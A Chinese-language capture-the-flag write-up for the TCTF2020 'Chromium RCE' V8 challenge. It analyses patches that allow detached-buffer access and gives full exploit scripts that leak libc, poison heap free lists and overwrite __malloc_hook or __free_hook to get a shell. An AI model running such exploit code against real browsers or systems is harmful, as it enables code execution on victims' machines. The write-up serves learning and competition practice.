TCTF2020 Quals Chromium RCE题解

2021-04-24

记录下当时很简单的一题v8

题目描述

Enviroment: Ubuntu18.04

Update: If you want to build one for debugging, please
git checkout f7a1932ef928c190de32dd78246f75bd4ca8778b

查看diff文件

这里直接看注释就能理解，一个是不需要--allow-native-syntax flag 我们就能直接调用%ArrayBufferDetach，第二个是我们只能调用%ArrayBufferDetach，%DebugPrint这个就变成了Undefined了

diff --git a/src/parsing/parser-base.h b/src/parsing/parser-base.h
index 3519599a88..f1ba0fb445 100644
--- a/src/parsing/parser-base.h
+++ b/src/parsing/parser-base.h
@@ -1907,10 +1907,8 @@ ParserBase<Impl>::ParsePrimaryExpression() {
       return ParseTemplateLiteral(impl()->NullExpression(), beg_pos, false);
 
     case Token::MOD:
-      if (flags().allow_natives_syntax() || extension_ != nullptr) {
-        return ParseV8Intrinsic();
-      }
-      break;
+      // Directly call %ArrayBufferDetach without `--allow-native-syntax` flag
+      return ParseV8Intrinsic();
 
     default:
       break;
diff --git a/src/parsing/parser.cc b/src/parsing/parser.cc
index 9577b37397..2206d250d7 100644
--- a/src/parsing/parser.cc
+++ b/src/parsing/parser.cc
@@ -357,6 +357,11 @@ Expression* Parser::NewV8Intrinsic(const AstRawString* name,
   const Runtime::Function* function =
       Runtime::FunctionForName(name->raw_data(), name->length());
 
+  // Only %ArrayBufferDetach allowed
+  if (function->function_id != Runtime::kArrayBufferDetach) {
+    return factory()->NewUndefinedLiteral(kNoSourcePosition);
+  }
+
   // Be more permissive when fuzzing. Intrinsics are not supported.
   if (FLAG_fuzzing) {
     return NewV8RuntimeFunctionForFuzzing(function, args, pos);

测试下看看：

 ruan@ubuntu  ~/chrome_challenge/tctf2020_chromium_rce/tctf  ./d8 --allow-natives-syntax          
V8 version 8.5.0 (candidate)
d8> var a = [1];
undefined
d8> %DebugPrint(a);
undefined
d8>

这个patch搜索了一番，应该是禁用了wasm的利用方法：

diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index 117df1cc52..9c6ca7275d 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -1339,9 +1339,9 @@ MaybeLocal<Context> Shell::CreateRealm(
     }
     delete[] old_realms;
   }
-  Local<ObjectTemplate> global_template = CreateGlobalTemplate(isolate);
   Local<Context> context =
-      Context::New(isolate, nullptr, global_template, global_object);
+      Context::New(isolate, nullptr, ObjectTemplate::New(isolate),
+                   v8::MaybeLocal<Value>());
   DCHECK(!try_catch.HasCaught());
   if (context.IsEmpty()) return MaybeLocal<Context>();
   InitializeModuleEmbedderData(context);
@@ -2260,10 +2260,7 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
             v8::Isolate::kMessageLog);
   }
 
-  isolate->SetHostImportModuleDynamicallyCallback(
-      Shell::HostImportModuleDynamically);
-  isolate->SetHostInitializeImportMetaObjectCallback(
-      Shell::HostInitializeImportMetaObject);
+  // `import("xx")` is not allowed
 
 #ifdef V8_FUZZILLI
   // Let the parent process (Fuzzilli) know we are ready.
@@ -2285,9 +2282,9 @@ Local<Context> Shell::CreateEvaluationContext(Isolate* isolate) {
   // This needs to be a critical section since this is not thread-safe
   base::MutexGuard lock_guard(context_mutex_.Pointer());
   // Initialize the global objects
-  Local<ObjectTemplate> global_template = CreateGlobalTemplate(isolate);
   EscapableHandleScope handle_scope(isolate);
-  Local<Context> context = Context::New(isolate, nullptr, global_template);
+  Local<Context> context = Context::New(isolate, nullptr,
+                                        ObjectTemplate::New(isolate));
   DCHECK(!context.IsEmpty());
   if (i::FLAG_perf_prof_annotate_wasm || i::FLAG_vtune_prof_annotate_wasm) {
     isolate->SetWasmLoadSourceMapCallback(ReadFile);

这里的diff应该是让TypedArray.prototype.set()能作用于一个DetachedBuffer上：

diff --git a/src/builtins/typed-array-set.tq b/src/builtins/typed-array-set.tq
index b5c9dcb261..babe7da3f0 100644
--- a/src/builtins/typed-array-set.tq
+++ b/src/builtins/typed-array-set.tq
@@ -70,7 +70,7 @@ TypedArrayPrototypeSet(
     // 7. Let targetBuffer be target.[[ViewedArrayBuffer]].
     // 8. If IsDetachedBuffer(targetBuffer) is true, throw a TypeError
     //   exception.
-    const utarget = typed_array::EnsureAttached(target) otherwise IsDetached;
+    const utarget = %RawDownCast<AttachedJSTypedArray>(target);
 
     const overloadedArg = arguments[0];
     try {
@@ -86,8 +86,7 @@ TypedArrayPrototypeSet(
       // 10. Let srcBuffer be typedArray.[[ViewedArrayBuffer]].
       // 11. If IsDetachedBuffer(srcBuffer) is true, throw a TypeError
       //   exception.
-      const utypedArray =
-          typed_array::EnsureAttached(typedArray) otherwise IsDetached;
+      const utypedArray = %RawDownCast<AttachedJSTypedArray>(typedArray);
 
       TypedArrayPrototypeSetTypedArray(
           utarget, utypedArray, targetOffset, targetOffsetOverflowed)

poc如下：

var buffer1 = new ArrayBuffer(0x100);
var uint8_1 = new Uint8Array(buffer1);
var buffer2 = new ArrayBuffer(0x100);
var uint8_2 = new Uint8Array(buffer2);
// %DebugPrint(uint8_2);
%ArrayBufferDetach(buffer1);
uint8_2.set(uint8_1);
uint8_2[0] = 0xca;
uint8_2[0x1] = 0xfe;
uint8_1.set(uint8_2);
%DebugPrint(uint8_2);
%SystemBreak();

效果：

我自己编译了一个debug版本的d8，而且把最后两个diff给去掉了，这样就能用%DebugPrint和%SystemBreak了

exploit

经过上面的分析，这题就变向的变成了一道堆题目，利用过程如下：

从unsortedbin里泄露libc地址
由于ArrayBuffer在分配的时候使用calloc分配的，所以先把0x70大小的tcache填满，在释放一个chunk到0x70大小的fastbin
修改fastbin的fd，使其指向__malloc_hook-0x23，在改__malloc_hook为one_gadget就行

最终exp：

// leak libc
var buffer1 = new ArrayBuffer(0x2000);
var uint64_arr1 = new BigUint64Array(buffer1);
var buffer2 = new ArrayBuffer(0x2000);
var read_array = new BigUint64Array(buffer2);

%ArrayBufferDetach(buffer1);
read_array.set(uint64_arr1);
var libc_base = read_array[1] - 0x3ebca0n;
var malloc_hook = libc_base + 0x3ebc30n;
var one_gadget = libc_base + 0xe5622n;

console.log("libc_base : 0x" + libc_base.toString(16));

var a = new ArrayBuffer(8);
var one = new Uint8Array(a);

for(var i = 0n;i < 8n;i++){
    one[i] = Number((one_gadget >> i*8n) & 0xffn);
}

var tcache_chunks = new Array(7);

for(var i = 0;i < 7;i++){
    tcache_chunks[i] = new ArrayBuffer(0x60);
}

var alloc1 = new ArrayBuffer(0x60);
var uint64_arr2 = new BigUint64Array(alloc1);
var alloc2 = new ArrayBuffer(0x60);
var write_array = new BigUint64Array(alloc2);

for(var i = 0;i < 6;i++){
    %ArrayBufferDetach(tcache_chunks[i]);
}

%ArrayBufferDetach(alloc2);


uint64_arr2[0] = malloc_hook - 0x23n;
write_array.set(uint64_arr2);

alloc2 = new ArrayBuffer(0x60);
alloc2 = new ArrayBuffer(0x60);
write_array = new Uint8Array(alloc2);
// %DebugPrint(write_array);


write_array.set(one,0x13);

结果：

one_gadget的地址可能会因为不同版本的libc而不同

解出来后，去搜索了下别人的wp，看到能让Array使用malloc分配内存的办法：

1
2
3

let a = {};
a.length = size; // malloc的大小
return new Uint8Array(a);

这样子的话好利用多了，直接改tcache的fd就行：

// leak libc
var buffer1 = new ArrayBuffer(0x2000);
var uint64_arr1 = new BigUint64Array(buffer1);
var buffer2 = new ArrayBuffer(0x2000);
var read_array = new BigUint64Array(buffer2);

%ArrayBufferDetach(buffer1);
read_array.set(uint64_arr1);
var libc_base = read_array[1] - 0x3ebca0n;
var free_hook = libc_base + 0x3ed8e8n;
var system_addr = libc_base + 0x4f550n;

console.log("libc_base : 0x" + libc_base.toString(16));

var a = new ArrayBuffer(8);
var system = new Uint8Array(a);

for(var i = 0n;i < 8n;i++){
    system[i] = Number((system_addr >> i*8n) & 0xffn);
}


function malloc_size(sz){
    let a = {};
    a.length = sz; // malloc的大小
    return new Uint8Array(a);
}


var alloc1 = new ArrayBuffer(0x60);
var uint64_arr2 = new BigUint64Array(alloc1);
var alloc2 = new ArrayBuffer(0x60);
var write_array = new BigUint64Array(alloc2);



%ArrayBufferDetach(alloc2);


uint64_arr2[0] = free_hook;
write_array.set(uint64_arr2);

var t = malloc_size(0x60);
t = malloc_size(0x60);

uint64_arr2[0] = 0x68732f6e69622fn;		// /bin/sh\x00
t.set(system);
%ArrayBufferDetach(uint64_arr2.buffer);

总结

这次是真的自己认认真真的没有参考别人的wp来解的（算是能看的懂简单的v8了？哈哈，其实连皮毛都不算），希望今年的tctf不要爆零

题目描述

查看diff文件

exploit

总结

参考链接